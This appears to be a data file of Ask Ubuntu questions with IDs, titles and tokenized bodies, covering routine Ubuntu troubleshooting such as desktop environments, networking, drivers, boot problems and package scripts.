6.6 sy , 0.0 ni , 60.7 id , 1.5 wa , 0.0 hi , 1.1 si , 0.0 st kib mem : 2017020 total , 1677448 used , 339572 free , 19320 buffers kib swap : 1951740 total , 350824 used , 1600916 free , 319840 cached pid user pr ni virt res shr s % cpu % mem time+ command 4040 user 20 0 1422m 171m 13m s 34.8 8.7 19:18.97 /opt/google/chrome/chrome -- type=ppapi -- channel=27439.222.1491200131 -- ppapi-flash-args -- lang=en-us 27439 user 20 0 1200m 155m 27m s 5.8 7.9 23:40.88 /opt/google/chrome/chrome 4557 user 20 0 1051m 118m 36m s 17.4 6.0 3:04.41 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/cookieretentionpriorit 4178 user 20 0 1047m 114m 20m s 0.0 5.8 0:15.02 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/cookieretentionpriorit 1440 root 20 0 324m 113m 37m s 5.8 5.8 311:38.50 /usr/bin/x :0 -core -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none 27709 user 20 0 483m 86m 39m s 34.8 4.4 45:14.61 /opt/google/chrome/chrome -- type=gpu-process -- channel=27439.14.194140808 -- supports-dual-gpus=false -- gpu-driver-bug-workarounds=0,13,22,26 -- disabl 4818 user 20 0 1015m 85m 32m s 0.0 4.3 0:10.32 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/cookieretentionpriorit 1945 user 20 0 967m 79m 8084 s 0.0 4.0 0:10.40 gnome-panel 2488 user 20 0 1301m 61m 20m s 0.0 3.1 1:28.02 /usr/lib/gnome-settings-daemon/gnome-settings-daemon 2588 user 20 0 1443m 39m 4604 s 0.0 2.0 1:26.31 nm-applet 2692 user 20 0 559m 37m 12m s 0.0 1.9 0:12.79 gnome-screensaver 27509 user 20 0 952m 36m 6076 s 0.0 1.9 0:02.37 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/cookieretentionpriorit 27521 user 20 0 957m 35m 5216 s 0.0 1.8 0:06.32 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/cookieretentionpriorit 2629 user 20 0 1024m 35m 6248 s 0.0 1.8 6:33.90 /usr/bin/cli /usr/lib/gnome-do/do.exe 2669 user 20 0 1797m 33m 5020 s 0.0 1.7 3:16.08 /var/lib/dropbox/.dropbox-dist/dropbox 2685 user 20 0 351m 29m 1480 s 0.0 1.5 0:26.61 /usr/lib/telepathy/mission-control-5 27515 user 20 0 939m 25m 4712 s 0.0 1.3 0:01.96 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/cookieretentionpriorit 27499 user 20 0 938m 24m 4860 s 0.0 1.3 0:02.79 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/cookieretentionpriorit 27526 user 20 0 935m 21m 2960 s 0.0 1.1 0:00.45 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/cookieretentionpriorit 1148 www-data 20 0 45980 17m 456 s 0.0 0.9 0:14.74 /usr/local/sbin/elogd -d -c /opt/elog/elogd.cfg 27713 user 20 0 354m 15m 156 s 0.0 0.8 0:00.00 /opt/google/chrome/chrome -- type=gpu-process -- channel=27439.14.194140808 -- supports-dual-gpus=false -- gpu-driver-bug-workarounds=0,13,22,26 -- disabl 27446 user 20 0 353m 14m 1152 s 0.0 0.7 0:00.69 /opt/google/chrome/chrome -- type=zygote
382808	updated some software - now cinnamon wo n't work , i think gnome desktop became default from unity , how to change this ?	i updated my ubuntu 12.10 today and everything has got changed . the color , theme , the top window bar looks different . earlier i was using unity and it looks now gnome has become the default . i was also using cinnamon so i am not sure if it is still working or that too got broke . how to get to default settings ? ( i think i was using unity + cinnamon ) ? this is what i get in terminal , it looks all the desktop environments are running ! xxx @ xxx : ~ $ ps -a | egrep -i `` gnome|kde|mate|cinnamon '' 22 ? 00:00:00 kdevtmpfs 2172 ? 00:00:02 gnome-keyring-d 2183 ? 00:00:00 cinnamon-sessio 2266 ? 00:00:01 cinnamon-settin 2304 ? 00:05:23 cinnamon 2349 ? 00:00:00 polkit-gnome-au 2358 ? 00:00:00 cinnamon-fallba 2506 ? 00:00:00 cinnamon-screen 5631 ? 00:00:02 gnome-system-mo 5697 ? 00:00:00 gnome-terminal 5703 ? 00:00:00 gnome-pty-helpe xxx @ xxx : ~ $ ls /usr/bin/*session /usr/bin/cinnamon-session /usr/bin/ck-launch-session /usr/bin/gnome-session
382814	stop networkmanager daemon	i need to stop networkmanager daemon . i used this command : chkconfig networkmanager off ; service networkmanager stop i waited almost more than 5 min but status is still : stopping networkdameon manager : does it take more time ? thx
382816	ubuntu 12.04 mtp support for android 4.4	i have been using gvfs-mtp to get access to the my nexus 4 ( android 4.3 ) memory through mtp . since my nexus 4 get android 4.4 updates , i can no longer transfer files to it . i have tried several methods , including go-mtpfs gvfs-mtp gmtp ( keep on crashing ) and none of the above works . any idea to solve this ? thanks in advance .
382820	acer touch pad not working	i have upgraded my ubuntu 12.4 to 13.4 , everything is fine but my touch pad is not working . why touch pad is not accepting clicks ?
382821	typing caron : only ě works	i am trying to type a caron symbol above vowels ( for pinyin ) . after a disappointing amount of searching i turned the left flag key into compose and can now do leftflagkey , shift , ( < ) , e to get ě ( e with 'reverse hat ' ) . however , the same trick does not work for a , i , o or u ( nothing is shown ) , even though those do exist ( ǎǐǒǔ ) . can i get this to work somehow ?
382822	uninstall ubuntu 12.4 from dual boot with windows 8	i installed ubuntu 12.04 on preinstalled windows 8 laptop . the problem i had was my windows 8 was installed in uefi mode and ubuntu was installed in legacy mode . so i was unable to boot windows from grub . i needed to turn on uefi for booting windows and turn off uefi for booting to ubuntu . but while installing ubuntu i had selected install ubuntu alongside windows 8 instead of selecting something else option . so my ubuntu was not installed in separate partition . so now i want to uninstall ubuntu . i will be installing it later in other drive . so i need some suggestions on how to uninstall it without affecting windows 8 because i do not have windows 8 recovery disk
382823	user password rejected on login screen but accepted on text console login	while updating 13.04 raring ringtail on a fresh installation my system froze . on reboot i am unable to log in on the graphical screen . ctrl-alt-f2 takes me to the command line where the login works correctly . i then completed the `` sudo passwd '' process with positive results . on returning to the graphical screen i saw no change in accessing the account . i suspect something was corrupted during the crash . i 'm too new at ubuntu to know where to look , much less what to do in order to straighten out whatever was broken . all advice , step by step instruction , etc . much appreciated . my fall back is to reinstall the os from scratch as it 's a new system . which is more efficient , fix or reinstall ? thanks .
382825	cross-compile to 32-bit with bfd support	is there any method to cross-compile application for 32-bit ( under 64-bit host ) with bfd support . # compiles fine for host $ g++ -m64 test.cpp -liberty -lbfd # ca n't find 32-bit iberty and bfd $ g++ -m32 test.cpp -liberty -lbfd /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../libiberty.a when searching for -liberty /usr/bin/ld : skipping incompatible /usr/lib/libiberty.a when searching for -liberty /usr/bin/ld : can not find -liberty /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../libbfd.so when searching for -lbfd /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../libbfd.a when searching for -lbfd /usr/bin/ld : skipping incompatible /usr/lib/libbfd.so when searching for -lbfd /usr/bin/ld : skipping incompatible /usr/lib/libbfd.a when searching for -lbfd /usr/bin/ld : can not find -lbfd collect2 : error : ld returned 1 exit status the problem i ca n't install binutils-dev : i386 , because it apt-get asks to remove 64-bit binutils . $ sudo apt-get install binutils : i386 binutils-dev : i386 reading package lists ... done building dependency tree reading state information ... done ... . the following packages will be removed : binutils binutils-arm-linux-gnueabi binutils-dev binutils-mingw-w64-i686 ... .. ... so , is there any other method to compile it without i386 chroot environment ?
382828	black screen after login ubuntu 13.10	so i boot up and everything is fine until i log in , then i get a black screen and my cursor . people say hit alt + ctrl + f1 and then it asks for my login . i type in my regular log in , which is `` jay '' , and my password and it says it 's incorrect . i have no idea what to do . i 'm having trouble grasping it . i 'm pretty sure this problem was caused because i updated the nvidia graphics setting to the most recent , which i 've come to find out is n't a good idea .
382830	need drivers for sleekbook 14 model b031us	i am using hp sleekbook 14 the model is b031us but i do n't have bluetooth drivers can you please help me out in this . regards , r. suresh
382831	how to resolve wireless soft blocking permanently	i have ubuntu 12.04 and my laptop has intel corporation pro/wireless 3945abg [ golan ] wireless . every time i restart my laptop i am required to run following commands in order to resolve wireless soft blocking and make it connect to wireless networks : sudo rfkill unblock wifi ; sudo rfkill unblock all ifconfig wlan0 how can i make this change permanent ?
382832	ubuntu 12.04 runs slow , boots slow	well i am new to linux environment ( hardly a week ) just threw away my windows8 and started using ubuntu 12.04 what i found difficult was its running slower , i wonder why although my laptop is old ( perserio c700 ) its gave me good performance on win8 , so logically speaking the hardware is fine & feel like something might be wrong on the os , i checked some basic things like the cpu ( which also not is consuming too much ) & and ram are just fine could anyone please suggest where to find a solution for this
382837	installing ubuntu on a specific partition	i wanted to switch from win7 to ubuntu . i have two partitions , c where my system is , and d where i keep personal files and other stuff i need ( it would be really a disaster if something happened to them ) . my question is how to install ubuntu on my c partition and format it of course ?
382840	gparted wo n't format fat32 partition	i get this error when attempting to create a fat32 partition with gparted : mkdosfs : failed whilst writing fat i 've tried creating a new partition table first , wiping the drive ( with 0 's ) , and formatting it ext2-4 before making it fat32 . no dice . here are screenshots showing the error and drive information : update : i 'm getting a lot of questions in comments . let me try to answer all of those and preempt more . the drive was previously a mac os x 'time machine ' backup drive , and was thus formatted with hfs+ with a gpt . this should not matter since i physically ( as opposed to logically ) wiped the drive with \x00 's . i have tried running the command manually without using gparted , i get the same error displayed in the above screenshot . the drive is a usb-powered portable drive ( you can see more details in the drive information screenshot ) . i have ( and am using ) root permissions . i installed the latest version of gparted using the package manager . i am open to alternate solutions for formatting this drive as fat32 that do not use gparted or mkdosfs . the end goal is to format the drive .
382845	where the files goes when restore that file in trash	accidentally one of my folder was delete by my own self ( that folder was at downloads ) . and then i moved to trash and that folder was there . then i right click on that folder and select restore . but now that folder is not in downloads neither trash , so where that file goes after restore ? is there any way to get that file ? ( i 'm using ubuntu 12.04 ) in terminal i tried this to search it as said in early question asked in askubuntu cd .local/share/trash/files but after ls that was empty . give some help .
382847	error while installing & configuring openldap in ubuntu 12.10 server	when i run ldapsearch -x i get # extended ldif # # ldapv3 # base < > ( default ) with scope subtree # filter : ( objectclass=* ) # requesting : all # # search result search : 2 result : 32 no such object # numresponses : 1
382849	which is strong ubuntu dist or windows ?	gentlemen , i am using windows in my company . i want to secure my system or to secure my company systems . should my company use linux ( ubuntu ) to become more secure than windows 8 ? what also the precautions to be implemented to secure the company network ? i thought first thing my company should do is to use ubuntu which is completely different from windows . so i asked this question here and please some help .
382855	very slow speed while mounting via sshfs	my host is ubuntu 12.04 . my guest is vanilla 3.0.33 kernel with custom rootfs . i have encountered the subj problem , while mounting host folder on the guest machine via sshfs . sshfs alexhoppus @ 10.0.2.2 : /home/alexhoppus/desktop/fold /fold_sshfs i can see all files and folders open / read / write them but again , it 's take a lot of time to copy 20mb file from host to guest . i takes approximately 30 sec to copy 1000k can anyone help me with this issue ? thanks . ps i saw this thread sshfs very slow in 12.04 but offered solutions do not work at all . -- - added -- -- i just checked - the same thing is with nfs . help me please !
382859	disabling the ubntu desktop enviourment	i have ubuntu 13.04 setup i want to disable the feature ( dash , default search , left click and right click option on desktop ) of ubuntu desktop environment . i found these commands for disabling right click to disable right click for just desktop : xmodmap -e `` pointer = 1 2 99 '' to apply for system wide : xmodmap -e 'pointer = 1 2 0 4 5 6 7 8 9' are there commands to disable dash and left click functionality too.. ? ?
382861	12.04 in virtualbox does n't execute any custom startup script	i 'm trying to use vagrant for our development process , mostly web development on a lamp system . on shutdown of the vm i dump the content of the mysql database to an sql file in the shared folder . this is the content of the /etc/init/mysql-on-shutdown.conf file , which works fine : start on stopping mysql task exec /etc/init.d/mysql-on-shutdown the mysql-on-shutdown script uses mysqldump to save the db and everything works as it should . on startup of the vm i 'll want to import the very same sql file into mysql again . my script /etc/init.d/mysql-on-startup works flawlessly when executed directly , but i have no luck having it started by the ubuntu 12.04 ( 32bit ) system within my vm . i tried it in several ways : start on mysql start on ( mysql and runlevel [ 2345 ] ) start on starting mysql i even tried to start my script with start on runlevel [ 2345 ] , just to see if the upstart system will start it anyway , and this did n't work either . there is also no log file in the /var/log/upstart/ folder for my startup script , while the shutdown script has its logfile there . i even put a symlink in /etc/rcs.d/ , and i tried to get it executed via rc.local , with no success as well . so , my vm does n't execute any of my startup scripts , no matter what mechanism i try . here are the software details : host : mac os x 10.8.5 guest : linux precise32 3.2.0-23-generic-pae # 36-ubuntu smp tue apr 10 22:19:09 utc 2012 i686 i686 i386 gnu/linux ( image file from http : //files.vagrantup.com/precise32.box ) virtualbox 4.2.18 vagrant 1.3.5 edit : that 's the content of /etc/rc.local # ! /bin/sh -e dhclient eth0 /etc/init.d/mysql-on-startup exit 0 when i run sudo /etc/rc.local logged in via ssh , the script gets executed as expected .
382862	almost get wifi dongle d-link dwa-125 working as access point	i use hostapd . my android sees wifi network , connects to it , but stops on getting ip-address . what is wrong with my configs ? ~ > cat /etc/hostapd/hostapd.conf interface=wlan0 driver=nl80211 ssid=my_ap country_code=ru hw_mode=g channel=7 wpa=2 wpa_passphrase=my_password ~ > cat /etc/dhcp3/dhcpd.conf shared-network my_ap { subnet 10.254.239.0 netmask 255.255.255.0 { range 10.254.239.2 10.254.239.255 ; interface wlan0 ; option routers 10.254.239.1 ; option domain-name-servers 127.0.0.1 ; option broadcast-address 10.254.239.0 ; } } ~ > ifconfig eth0 link encap : ethernet hwaddr 00:24:1d : a0:79:54 inet addr:192.168.1.100 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :224:1dff : fea0:7954/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:12670 errors:0 dropped:0 overruns:0 frame:0 tx packets:11353 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:12385165 ( 12.3 mb ) tx bytes:1774003 ( 1.7 mb ) lo link encap : локальная петля ( loopback ) inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1209 errors:0 dropped:0 overruns:0 frame:0 tx packets:1209 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:125926 ( 125.9 kb ) tx bytes:125926 ( 125.9 kb ) mon.wlan0 link encap : unspec hwaddr 00-1e-58-4b-e6-24-30-30-00-00-00-00-00-00-00-00 up broadcast running multicast mtu:1500 metric:1 rx packets:29 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9628 ( 9.6 kb ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 00:1e:58:4b : e6:24 inet addr:10.254.239.1 bcast:10.254.239.255 mask:255.255.255.0 inet6 addr : fe80 : :21e:58ff : fe4b : e624/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:34 errors:0 dropped:3 overruns:0 frame:0 tx packets:299 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5978 ( 5.9 kb ) tx bytes:58877 ( 58.8 kb ) ~ > iwconfig mon.wlan0 ieee 802.11bg mode : monitor tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : on wlan0 ieee 802.11bg mode : master tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : on lo no wireless extensions . eth0 no wireless extensions . ~ > sudo hostapd -d /etc/hostapd/hostapd.conf configuration file : /etc/hostapd/hostapd.conf nl80211 : add own interface ifindex 4 nl80211 : new interface mon.wlan0 created : ifindex=11 nl80211 : add own interface ifindex 11 bss count 1 , bssid mask 00:00:00:00:00:00 ( 0 bits ) nl80211 : added 802.11b mode based on 802.11g information failed to update rate sets in kernel module rate [ 0 ] rate=10 flags=0x1 rate [ 1 ] rate=20 flags=0x1 rate [ 2 ] rate=55 flags=0x1 rate [ 3 ] rate=110 flags=0x1 rate [ 4 ] rate=60 flags=0x0 rate [ 5 ] rate=90 flags=0x0 rate [ 6 ] rate=120 flags=0x0 rate [ 7 ] rate=180 flags=0x0 rate [ 8 ] rate=240 flags=0x0 rate [ 9 ] rate=360 flags=0x0 rate [ 10 ] rate=480 flags=0x0 rate [ 11 ] rate=540 flags=0x0 completing interface initialization mode : ieee 802.11g channel : 7 frequency : 2442 mhz flushing old station entries deauthenticate all stations wpa_driver_nl80211_set_key : ifindex=4 alg=0 addr= ( nil ) key_idx=0 set_tx=1 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=4 alg=0 addr= ( nil ) key_idx=1 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=4 alg=0 addr= ( nil ) key_idx=2 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=4 alg=0 addr= ( nil ) key_idx=3 set_tx=0 seq_len=0 key_len=0 using interface wlan0 with hwaddr 00:1e:58:4b : e6:24 and ssid 'my_ap' deriving wpa psk based on passphrase ssid - hexdump_ascii ( len=5 ) : 64 75 72 61 62 my_ap psk ( ascii passphrase ) - hexdump_ascii ( len=18 ) : [ removed ] psk ( from passphrase ) - hexdump ( len=32 ) : [ removed ] wpa : group state machine entering state gtk_init ( vlan-id 0 ) gmk - hexdump ( len=32 ) : [ removed ] gtk - hexdump ( len=32 ) : [ removed ] wpa : group state machine entering state setkeysdone ( vlan-id 0 ) wpa_driver_nl80211_set_key : ifindex=4 alg=2 addr= ( nil ) key_idx=1 set_tx=1 seq_len=0 key_len=32 nl80211 : set beacon ( beacon_set=0 ) wlan0 : setup of interface done . rtm_newlink : operstate=0 ifi_flags=0x1002 ( ) rtm_newlink , ifla_ifname : interface 'mon.wlan0 ' added unknown event 5 rtm_newlink : operstate=0 ifi_flags=0x11043 ( [ up ] [ running ] [ lower_up ] ) rtm_newlink , ifla_ifname : interface 'mon.wlan0 ' added unknown event 5 rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added unknown event 5 rtm_newlink : operstate=0 ifi_flags=0x11043 ( [ up ] [ running ] [ lower_up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added unknown event 5
382864	no screens found with usable configuration ( live-cd ) , boot-repair cli	i have an msi ge70 laptop ( graphics : nvidia geforce gt650m ) . at first i could n't boot nor install . after adding 'nomodeset ' in grub i was able to start the installation . `try ubuntu `` just gave me a blank screen . i installed a dualboot with ubuntu 13.10 and windows 8.1 , uefi , secure boot off ( uefi with csm ) . after the installation was a success , the computer boots straight into windows . i knew this could happen and need to run boot-repair from the live-cd . unfortunately i ca n't find a way to do this from cli , since i get a blank screen in x i can not use it 's gui . i tried installing nvidia-current when booted with the live-cd , restarting lightdm ( /etc/init.d/lightdm stop/start ) . no luck . trying to diagnose the problem this are the things i found : /var/log/lightdm/x-0.log ends like this : ( ee ) fatal server error : ( ee ) no screens found ( ee ) ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help ( ee ) please also chech the log file at /var/log/xorg.0.log for additional information . ( ee ) ( ee ) server terminated with error ( 1 ) . closing log file . looking at /var/log/xorg.0.log i noticed : [ 1867.351 ] ( ii ) vesa ( 0 ) : initializing int10 [ 1867.351 ] ( ee ) vesa ( 0 ) : v_bios address 0x0 out of range [ 1867.351 ] ( ii ) unloadmodule : `` vesa '' [ 1867.351 ] ( ii ) unloadsubmodule : `` int10 '' [ 1867.351 ] ( ii ) unloading `` int10 '' [ 1867.351 ] ( ii ) unloadsubmodule : `` vbe '' [ 1867.351 ] ( ii ) unloading `` vbe '' [ 1867.351 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 1867.351 ] ( ee ) fatal server error [ 1867.351 ] ( ee ) no screens found [ 1867.351 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 1867.351 ] ( ee ) please also chech the log file at /var/log/xorg.0.log for additional information . [ 1867.351 ] ( ee ) [ 1867.351 ] ( ee ) server terminated with error ( 1 ) . closing log file . so i am trying to run boot-repair , but i 'm stuck because i ca n't get the gui working with the live-cd . i 've added nomodeset , tried xforcevesa . can anybody help me with either boot-repair from cli or graphics in live-cd ? for me it 's weird that the installation is able to show a nice gui where the live-cd does n't find a screen . if i am able to boot into installed ubuntu , i probably will run into the same graphics problems , but maybe it 's easier to fix them on an installed version ?
382866	configuring a usb modem in ubuntu 12.04 - toshiba laptop	strange problem in ubuntu i have installed ubuntu 12.04 64 bit version in my desktop and when i plugged in 2 different usb modems they were promptly recognized and was able to configure them using network manager . but the same cards refused to be recognized on a toshiba laptop . running lsusb for one of them ( desktop ) cpcadmin @ cpcadmin-sd30v10 : ~ $ lsusb bus 005 device 004 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800 ( hspa modem ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub running lsusb after a few seconds cpcadmin @ cpcadmin-sd30v10 : ~ $ lsusb bus 005 device 005 : id 12d1:140b huawei technologies co. , ltd. ec1260 wireless data modem hsd usb card bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub its only after the same card is recognized as 140b by ubuntu was i able to use the network manager to configure the internet . the same card when plugged into the laptop would just stop with the first step where it was recognized as a 1446 device . any idea as to what i need to do in the laptop ? thanks in advance regards vivek
382867	how can i run gcp without an x server ?	i installed gcp because i often copy large directories from one place to another and i want to see a progress bar to know how long it will take , but this is running on a minimal server so i do n't have x and running gcp gives this error : traceback ( most recent call last ) : file `` /usr/bin/gcp '' , line 678 , in < module > gcp = gcp ( ) file `` /usr/bin/gcp '' , line 205 , in __init__ raise e dbus.exceptions.dbusexception : org.freedesktop.dbus.error.notsupported : unable to autolaunch a dbus-daemon without a $ display for x11 is there anything i can do about it without installing x ? are there any alternatives to gcp that work from the console and support recursive copying with progress bar ?
382868	no space left during update	i have got a samsung galaxy nexus with ubuntu 13.10 , a write protected flash installation ( not even password change seems to be possible . ) my free space is 12.7 gb . `` last update 2000-01-01 '' seems to show that all previous attempts to update where unsuccessful . when i try to update with button `` check for updates '' it tells me `` ubuntu phone , version 31 '' . the download seems to complete 100 % . then error message , something like , error 28 : no more space left . df -h shows more or less plenty of space left , except for , /android/cache used 100 % of 426m , /android/system used 98 % of 59m , /tmp used 87 % of 347m . ( update of individual apps has worked previously . now double entries of apps appear in `` storage = > installed apps , by name '' . )
382869	why does sometimes my postinst executed while installing/removing other software ?	i have a deb package for my application . sometimes when i install or remove some software ( e.g . synaptic or openssh-server ) with command sudo apt-get install ( or remove ) synaptic it executes postinst script for my program with args `` configure 1.1.123.0 '' , where 1.1.123.0 is version of my app installed . why might this happen ? my program has nothing to do with synaptic , openssh-server and other software . how can i debug the cause of this ? here is the output from terminal : user @ ubuntu : ~/tmp $ sudo apt-get remove synaptic [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done package synaptic is not installed , so not removed the following packages were automatically installed and are no longer required : # this list does not contain myapp libdpkg-perl fakeroot gir1.2-ubuntuoneui-3.0 libalgorithm-merge-perl g++-4.6 cmake-data dh-apparmor libalgorithm-diff-xs-perl g++ libstdc++6-4.6-dev linux-headers-3.5.0-23-generic linux-headers-3.5.0-23 libubuntuoneui-3.0-1 thunderbird-globalmenu html2text libqt3-mt libalgorithm-diff-perl libxmlrpc-core-c3 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up myapp : i386 ( 1.1.777.0 ) ... /var/lib/dpkg/info/myapp.postinst configure 1.1.777.0 # this is debug string from my postinst script update-rc.d : warning : /etc/init.d/myapp missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > system start/stop links for /etc/init.d/myapp already exist . myapp already installed # < -- message and error from my postinst script dpkg : error processing myapp : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : myapp : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the outputs of sudo dpkg -- configure -a user @ ubuntu : ~ $ sudo dpkg -- configure -a setting up myapp : i386 ( 1.1.777.0 ) ... =/var/lib/dpkg/info/myapp.postinst=configure 1.1.777.0= update-rc.d : warning : /etc/init.d/myapp missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > system start/stop links for /etc/init.d/myapp already exist . starting ... myapp already running . rc from agent = 1 dpkg : error processing myapp : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : myapp : i386
382870	32 or 64 bit on 4gb ram acer netbook	i have a netbook with 4gb ram should i choose 32 or 64 bit ? what is the speed difference ? how is the compatibility with 32bit applications ?
382873	screen does not switch off when idle	i 'm using 13.04.3 lts on a desktop machine . whenever i lock the screen , the screen goes blank for a couple of seconds , but then shows the login screen again . it never actually switches off ( the power-saving light never comes on ) . gnome-screensaver appears to be running : misha @ misha-antec : ~ $ pidof gnome-screensaver 30126 also , while the screen idle timeout is set to 1 minute , the screen never goes blank or switches off , even when idle for long periods of time . how can i get my screen to switch off when locked ? how can i get the monitor to switch off after it has been idle for some time ?
382881	how can i run .exe files in ubuntu	i want to run .exe files in ubuntu . i 've already download wine but how it is work . is there an another software for this purpose
382887	zfs pool with disks labels /dev/disk/by-id/scsi*** disappeared after upgrade	recently i have upgraded my home server from 13.04 to 13.10 by dist-upgrade and my zfs pool which was built using ... /by-id/scsi*** disk names broke the problem is that scsi*** labels completely disappeared . only ata*** left . what is the difference between same disk under ata or scsi labels ? what could be reason ? the hardware is hp microsever n54l with 2tb wd disks
382888	java applet at startup with crontab not working	i know the question is asked in many variants and i have read them , but still can not find an answer to my problem . i have a jar file which i want to run at startup as root . i have tried in rc.local , but no matter what i try it does not work . so i tried crontab . i open it as root : sudo crontab -e and put the following in : @ reboot sudo /usr/bin/java -jar /home/lead/shutdown_3.0.1.jar hide the command works if executed right from the terminal , but at reboot it does not work . i have tried @ reboot sudo java -jar /home/lead/shutdown_3.0.1.jar hide too with no success . any advise please ? thanks ! -- p.s . i tried to set a simple cronjob to work on exact hour - /usr/bin/vlc it does not work . as it seems the crontab itself does not work . this is ubuntu 13.10 by the way . no errors or useful information in syslog neither .
382889	sending message to printk buffer from user space -- not working	actually i want my driver messages to reach my terminal for debugging purpose . so i just try to check by following below link . i refred following link : -- http : //elinux.org/debugging_by_printing i am using a ubuntu in side vmplayer virtual machine . ubuntu is running in terminal mode inside virtual machine . i am trying to send some message to kernel printk buffer , buts echo command fails . klog demon is also running i confirmed with following command . ps aux | grep klogd cat command on proc printk entry : -- - # cat /proc/sys/kernel/printk 4 4 1 7 run echo command : -- - # sudo echo `` < 1 > writing critical printk messages from userspace '' > /dev/kmsg but i am not able to get the message on the terminal . i am getting following error when runs above command : -- -bash : /dev/kmsg : permission denied please suggest how to print on console ? my actual requirement is to ... send messages of printk ( ) in my driver ... directly to my console . i am just testing here from my console that messages of low priority reaches console or not .
382893	how to add wpa enterprise tls connection in kubuntu ?	how to add wpa2 enterprise connection over tls in kubuntu 10.13 , using its standard network manager ? i want to connect to my university’s eduroam network and can not do it . when i try to do it in connections editor , when i do “add wireless connection” , after filling all necessary data ( network’s ssid and security details with wpa2 enterprise over tls authentication ) after clicking “ok” nothing happens . no connection’s being added . when i add some empty connection ( only ssid filled , no security checked ) it is being added to connections list , and i can edit it , but again after inserting security data it does not save changes . so i can not configure this connection . details i try to insert : security : wpa & wpa2 enterprise authentication : tls identity : my.identity @ student.put.poznan.pl user’s certificate : [ none ] ca certificate : [ path/to/cacert.pem ] user’s private key : [ path/to/user.p12 ] user’s key password : [ pass ] what are other ways to set the connection ?
382902	how do i make image viewer come to the foreground ?	when i open an image i get the dock icon alert me by shaking about in the panel . i thin have to click this to see the image . how do i make it so the image loads and the window comes to the foreground ? this was n't a a problem in releases previous to 13.10 .
382904	why script does n't see envvar while installing via ubuntu software center ?	i have a .deb package with configuration script which reads some environmental variable . this variable is added to /etc/environment file , and the system was rebooted . when i install the package from terminal the script can read the value of variable . but when i install the package from ubuntu software center the script read the empty value . why might this happen ?
